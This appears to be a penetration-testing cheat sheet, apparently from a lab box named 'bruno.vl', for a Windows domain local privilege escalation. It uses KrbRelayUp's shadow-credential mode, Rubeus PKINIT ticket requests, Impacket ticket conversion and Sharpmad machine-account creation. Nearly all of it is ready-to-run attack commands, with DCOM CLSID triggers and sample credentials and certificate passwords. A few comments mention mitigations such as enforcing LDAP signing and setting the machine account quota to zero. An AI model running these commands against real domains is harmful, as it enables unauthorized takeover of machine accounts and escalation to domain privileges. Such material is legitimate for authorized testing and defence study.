This is essentially a universal local privilege escalation in Windows domain environments where LDAP signing is not enforced (the default setting). "No-fix" means there is no patch for it, not that it cannot be mitigated: enforcing LDAP signing (and channel binding for LDAPS) on the domain controllers breaks the relay, and setting ms-DS-MachineAccountQuota to 0 blocks the variant that creates a new machine account — but not the shadow-credential write against an already existing machine account.
# Check if LDAP signing is not enforced (the relay target is LDAP; if signing is required the relay fails).
# NOTE: plaintext credentials passed on the command line end up in shell history and in `ps` output.
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M ldap-checker
# Check if we can use a shadow credential attack. Shadow credentials need PKINIT support on the DC.
# The maq module reads ms-DS-MachineAccountQuota, i.e. how many machine accounts this user may still add
# (only relevant for the "create a new machine account" variant further down, not for the shadowcred write itself).
cme ldap bruno.vl -u 'svc_scan' -p 'Sunshine1' -M maq
# Candidate DCOM CLSIDs for the KrbRelayUp -cls trigger; which one works depends on the target's OS/build, so try them in turn
c980e4c2-c178-4572-935d-a8a429884806
90f18417-f0f1-484e-9d3c-59dceee5dbd8
03ca98d6-ff5d-49b8-abc6-03dd84127020
d99e6e73-fc88-11d0-b498-00a0c90312f3 (certsrv.exe)
42cbfaa7-a4a7-47bb-b422-bd10e9d02700
000c101c-0000-0000-c000-000000000046
1b48339c-d15e-45f3-ad55-a851cb66be6b
49e6370b-ab71-40ab-92f4-b009593e4518
50d185b9-fff3-4656-92c7-e4018da4361d
3c6859ce-230b-48a4-be6c-932c0c202048 (trusted installer service)
# https://vulndev.io/cheats-windows/
Shadow Credentials attack
Purpose: write a shadow credential (msDS-KeyCredentialLink key pair) onto the existing DC machine account and use the resulting certificate to PKINIT a TGT as that machine account. Note that the TGT obtained below is issued to the machine account, not to Administrator; reaching Administrator requires a further impersonation step with that ticket, which is not shown in this excerpt.
# KrbRelayUp attack for shadow account with certificate.
# -cls is one of the DCOM CLSIDs listed above (this one is the certsrv.exe class); if the trigger fails, try another.
# -p is presumably the local port the relay listens on — check KrbRelayUp's usage output to confirm.
.\KrbRelayUp.exe full -m shadowcred -f -cls d99e6e73-fc88-11d0-b498-00a0c90312f3 -p 10246
# Get tgt: PKINIT as the machine account using the certificate from the KrbRelayUp output (presumably — verify).
# Template; /password: is the password protecting the certificate blob, not a domain password.
Rubeus.exe asktgt /user:<DC name> /certificate:<base 64 of certificate> /password:<Certificate Password> /enctype:<PKINIT etype> /nowrap
# Worked example (PS> = run from PowerShell on the Windows host). The certificate and its password are
# themselves a credential for the machine account — treat the output like a secret and do not leave it in logs.
PS> .\Rubeus.exe asktgt /user:brunodc$ /certificate:MIIKSA...<snip> /password:xP9-kA9#oX0# /enctype:AES256 /nowrap
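# Ensure that the ticket is issued to the machine account (brunodc$ above), not to the low-privileged user.
# Convert the ticket (run on the Linux attack box).
# Copy and paste the base64 ticket from the Rubeus output into a file named bruno_ticket.
# Decode it straight from the file (no need to pipe through cat) into a .kirbi blob.
base64 -d bruno_ticket > bruno_ticket.kirbi
# Impacket's ticketConverter.py turns the .kirbi into a ccache usable via KRB5CCNAME.
ticketConverter.py bruno_ticket.kirbi bruno_ticket.ccache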
# Create a new machine account (only possible if the MAQ check above returned a quota > 0).
# Pick a strong password instead of Pass.123 — this account is a real domain credential — and
# remove the account during cleanup; it persists after the engagement otherwise.
./Sharpmad.exe MAQ -Action new -MachineAccount evil -MachinePassword Pass.123
# Get the SID of new account (PS> = PowerShell on the Windows host).
# Read the raw objectSID bytes via ADSI, then convert them to the textual S-1-5-... form.
PS> $o = ([ADSI]"LDAP://CN=evil,CN=Computers,DC=bruno,DC=vl").objectSID
PS> (New-Object System.Security.Principal.SecurityIdentifier($o.value, 0)).Value